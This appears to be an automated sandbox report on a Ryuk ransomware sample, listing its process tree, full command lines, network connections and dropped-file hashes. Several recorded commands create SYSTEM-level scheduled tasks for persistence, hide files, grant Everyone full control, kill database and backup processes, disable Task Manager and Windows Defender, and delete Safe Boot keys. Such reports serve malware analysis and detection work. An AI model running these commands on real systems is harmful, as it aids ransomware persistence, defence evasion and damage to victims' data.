PID 4352 wrote to memory of 388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4824 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1556 wrote to memory of 968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4824 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 2896 wrote to memory of 4564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2896 wrote to memory of 4564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ryuk.exe

"C:\Users\Admin\AppData\Local\Temp\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa39ad055 /state1:0x41c64e6d

Network

Country Destination Domain Proto
N/A 10.127.0.1:445 tcp
FI 65.108.73.108:445 tcp
FI 65.108.73.108:139 tcp
N/A 10.127.0.1:139 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
NL 104.80.225.205:443 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 204.79.197.200:443 tcp

Files

memory/3064-132-0x0000000000000000-mapping.dmp

memory/3600-133-0x0000000000000000-mapping.dmp

memory/5032-134-0x0000000000000000-mapping.dmp

C:\ProgramData\ryuk.exe

MD5 35194c73ff38dd6c3bed7c0efcff6826
SHA1 1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
SHA256 5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
SHA512 cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

memory/1732-136-0x0000000000000000-mapping.dmp

memory/4112-137-0x0000000000000000-mapping.dmp

memory/4192-138-0x0000000000000000-mapping.dmp

memory/1672-139-0x0000000000000000-mapping.dmp

memory/1128-140-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 35194c73ff38dd6c3bed7c0efcff6826
SHA1 1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
SHA256 5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
SHA512 cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

memory/3596-142-0x0000000000000000-mapping.dmp

memory/4528-143-0x0000000000000000-mapping.dmp

memory/628-144-0x0000000000000000-mapping.dmp

memory/3568-145-0x0000000000000000-mapping.dmp

memory/1148-146-0x0000000000000000-mapping.dmp

memory/2372-147-0x0000000000000000-mapping.dmp

memory/2768-148-0x0000000000000000-mapping.dmp

memory/2324-149-0x0000000000000000-mapping.dmp

memory/2764-150-0x0000000000000000-mapping.dmp

memory/4532-151-0x0000000000000000-mapping.dmp

memory/1472-153-0x0000000000000000-mapping.dmp

memory/4352-152-0x0000000000000000-mapping.dmp

memory/228-154-0x0000000000000000-mapping.dmp

memory/1556-155-0x0000000000000000-mapping.dmp

memory/3884-156-0x0000000000000000-mapping.dmp

memory/3080-157-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog1

MD5 4b6fbbf03e95f33ba5c363bb67de4b9b
SHA1 e45dbd1ba30ef87d57779dc8ef3f58aba87e5960
SHA256 3f449da876b4329929cd0832cf5098b7f9e1c07e5e25ffcbd2bd03b80aa9ead0
SHA512 bc2216b3c363f5466dd290bb0de6167c15b5f23ecfce978dde46b853b6e9ce78a8d029033805bdd6177ea0ef64612e84857d893a0b9fad31f042e05e09ac7e3b

memory/1124-160-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 4b6fbbf03e95f33ba5c363bb67de4b9b
SHA1 e45dbd1ba30ef87d57779dc8ef3f58aba87e5960
SHA256 3f449da876b4329929cd0832cf5098b7f9e1c07e5e25ffcbd2bd03b80aa9ead0
SHA512 bc2216b3c363f5466dd290bb0de6167c15b5f23ecfce978dde46b853b6e9ce78a8d029033805bdd6177ea0ef64612e84857d893a0b9fad31f042e05e09ac7e3b

memory/388-161-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog2

MD5 9c66e5c92f7a62d7203428c7d1cda350
SHA1 5b8851a561e6c39000d58f6dcc91b858caa98224
SHA256 2d5f5f7ba92a73632855302d47121700e4cd39f2d6784332125ee2ac2acbc2fe
SHA512 9ce06641d71ecad6f5a24b4b402193f26cafe1a21c0ec44e61b2247959c47838299f06636e7ddea9e41eeb3f1f7dcb76489f2dfac51579f509618534b1b10911

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 9c66e5c92f7a62d7203428c7d1cda350
SHA1 5b8851a561e6c39000d58f6dcc91b858caa98224
SHA256 2d5f5f7ba92a73632855302d47121700e4cd39f2d6784332125ee2ac2acbc2fe
SHA512 9ce06641d71ecad6f5a24b4b402193f26cafe1a21c0ec44e61b2247959c47838299f06636e7ddea9e41eeb3f1f7dcb76489f2dfac51579f509618534b1b10911

memory/5112-164-0x0000000000000000-mapping.dmp

memory/968-165-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 20bf1c3daf0bf3cfb0db6661538a9afc
SHA1 5db0319ce78dcae075cc393c374b0856cdc2e02a
SHA256 fb3092f5b65b685c2b3550ddbabcc6313a90cced525fe2d3a3e76b692e5f09c6
SHA512 bfbac6e6618881f2b8bb119da816441d6540d4137bd4df631d1b3874f301aa1c599d5e488e109adae6e2ee26f15ca67e1d98a8e09bc9fedac77c99477e00e98e

C:\ProgramData\hrmlog2

MD5 9c66e5c92f7a62d7203428c7d1cda350
SHA1 5b8851a561e6c39000d58f6dcc91b858caa98224
SHA256 2d5f5f7ba92a73632855302d47121700e4cd39f2d6784332125ee2ac2acbc2fe
SHA512 9ce06641d71ecad6f5a24b4b402193f26cafe1a21c0ec44e61b2247959c47838299f06636e7ddea9e41eeb3f1f7dcb76489f2dfac51579f509618534b1b10911

C:\ProgramData\RYUKID

MD5 20bf1c3daf0bf3cfb0db6661538a9afc
SHA1 5db0319ce78dcae075cc393c374b0856cdc2e02a
SHA256 fb3092f5b65b685c2b3550ddbabcc6313a90cced525fe2d3a3e76b692e5f09c6
SHA512 bfbac6e6618881f2b8bb119da816441d6540d4137bd4df631d1b3874f301aa1c599d5e488e109adae6e2ee26f15ca67e1d98a8e09bc9fedac77c99477e00e98e

memory/4804-169-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog1

MD5 4b6fbbf03e95f33ba5c363bb67de4b9b
SHA1 e45dbd1ba30ef87d57779dc8ef3f58aba87e5960
SHA256 3f449da876b4329929cd0832cf5098b7f9e1c07e5e25ffcbd2bd03b80aa9ead0
SHA512 bc2216b3c363f5466dd290bb0de6167c15b5f23ecfce978dde46b853b6e9ce78a8d029033805bdd6177ea0ef64612e84857d893a0b9fad31f042e05e09ac7e3b

memory/5060-171-0x0000000000000000-mapping.dmp

C:\ProgramData\RyukReadMe.txt

MD5 3cfd6ef3b2825aa6ce421e10604ff452
SHA1 7c7c75df4105d3b0d69d1e03220f4d24644a8bde
SHA256 65adfc7e8a2bf62ec815a0aded844c1f0812576d655e523201b02ca5ffe3313d
SHA512 d6c130f880ae02ff9f1d08e4b8c825d42f0ea640bd74faf16841a13438976b5e41b94d6260da1622848c3197ad25f446064fd60264b62d992b87c780dbb693fc

memory/2896-173-0x0000000000000000-mapping.dmp

memory/4564-174-0x0000000000000000-mapping.dmp

memory/2548-175-0x0000000000000000-mapping.dmp

memory/2464-176-0x0000000000000000-mapping.dmp

memory/1976-177-0x0000000000000000-mapping.dmp

memory/1288-178-0x0000000000000000-mapping.dmp

memory/3876-179-0x0000000000000000-mapping.dmp

memory/1312-180-0x0000000000000000-mapping.dmp